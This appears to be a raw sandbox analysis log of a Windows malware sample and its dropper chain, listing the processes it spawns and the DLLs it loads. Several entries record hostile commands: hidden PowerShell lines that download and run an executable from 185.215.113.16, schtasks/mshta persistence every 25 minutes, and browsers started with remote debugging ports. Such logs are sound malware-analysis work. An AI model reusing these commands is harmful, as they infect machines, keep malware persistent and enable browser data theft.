Source: hHtR1O06GH.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\hHtR1O06GH.exe

File read: C:\Users\user\Desktop\hHtR1O06GH.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hHtR1O06GH.exe "C:\Users\user\Desktop\hHtR1O06GH.exe"
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe "C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process created: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe "C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 840
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe "C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe "C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe "C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe"
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process created: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe "C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe"
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 964
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe"
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe"
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe"
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 964
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe "C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe"
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2276,i,6118393692316943769,361084761922712429,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1085379021\am_no.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1085379021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE "C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe "C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe"
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn iHAoEmaFAXq /tr "mshta C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe"
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe"
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn iHAoEmaFAXq /tr "mshta C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1232 -s 952
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe "C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe "C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe "C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe "C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe "C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1085379021\am_no.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process created: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe "C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process created: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe "C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe"
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe"
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe"
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn RGN8PmarJNM /tr "mshta C:\Users\user\AppData\Local\Temp\UgD7WgJAg.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE "C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2724 --field-trial-handle=2276,i,6118393692316943769,361084761922712429,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1085379021\am_no.cmd" any_word
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 5 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn iHAoEmaFAXq /tr "mshta C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 4 \| ForEach-Object {[char]$_})"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn iHAoEmaFAXq /tr "mshta C:\Users\user\AppData\Local\Temp\qBrryFCFZ.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe"
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Process created: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe "C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HLP0OZ88YBEHH5W0RICPGVIH3THMV5N1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
